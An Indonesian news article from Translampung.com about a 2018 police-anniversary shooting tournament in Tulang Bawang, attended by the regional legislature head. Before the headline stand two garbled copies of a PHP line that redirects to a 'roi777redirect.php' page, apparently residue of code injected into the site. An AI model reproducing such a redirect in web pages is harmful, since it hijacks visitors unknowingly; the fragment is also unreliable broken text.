header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Expo Hut Bhayangkara Ke-72 Ketua DPRD Turut Bagian -
Expo Hut Bhayangkara Ke-72 Ketua DPRD Turut Bagian

TRANSLAMPUNG.COM–PANARAGAN
Ketua Dewan perwakilan Rakyat Daerah‎ (DPRD) Kabupaten Tulangbawang Barat (Tubaba) Busroni.,SH, turut bagian dalam kegiatan Open Tournament Kejuaraan Menembak, pada Expo Jambore Lintas Komunitas II saat peringatan Hari Bhayangkara ke-72 di Mapolres Tulang Bawang (Tuba) pada (1/7/2018) pukul 10:00 Wib.

Kegiatan tersebut digelar dilapangan Tembak Wira Satya, ‎juga dibuka langsung secara simbolis oleh Kapolres Tulang Bawang  (Tuba) AKBP Raswanto Hadiwibowo, SIK, M.Si bersama Bupati Tulang Bawang Hj. Winarti, SE, MH dan Dandim 0426 Tulang Bawang Letkol Arm Kus Fiandar Yusuf.

Menurut ketua pelaksana kegiatan juga Kasat Narkoba Iptu Boby yulfia‎ mengatakan, sebanyak 109 peserta ikut ambil bagian dalam perlombaan menembak,  dengan mengunakan senpi di khususkan untuk peserta dari TNI, Polri dan Perbakin, sementara perlombaan menembak dengan menggunakan senapan PCP dan gejluk untuk peserta dari umum.

” Menembak dengan menggunakan senpi dan gejluk hanya dengan satu posisi yaitu berdiri dan untuk menembak dengan menggunakan senapan PCP dengan tiga posisi yaitu tiarap, jongkok dan berdiri, nantinya untuk para pemenang lomba menembak, mendapatkan tropy, piagam dan uang pembinaan dari panitia yang diserahkan langsung oleh Kasat Narkoba, Sekretaris Perbakin Provinsi Lampung, Ketua Perbakin Tulang Bawang dan Perwakilan dari Kodim 0426 Tulang Bawang.‎‎” Kata Boby dalam pres rilisnya saat dikutip Translampung.com.

‎Sementara itu, Ketua DPRD Tubaba Busroni.,SH sangat mengapresiasi kemeriahan dan kebersamaan jajaran Mapolres Tulang Bawang (Tuba) dalam memperingati Hari Bhayangkara ke-72 bersama rakyat umumnya.

‎” Seluruh peserta berasal dari beragam komponen pejabat hingga masyarakat umum, saya pribadi pun atas nama lembaga mengucapkan selamat Dirgahayu‎ Bhayangkara ke-72, semoga Polri senantiasa bersama rakyat dan selalu untuk rakyat.” Imbuh Busroni. (Dirman)

 

 

News Reporter
Kepala Biro Tulangbawang Barat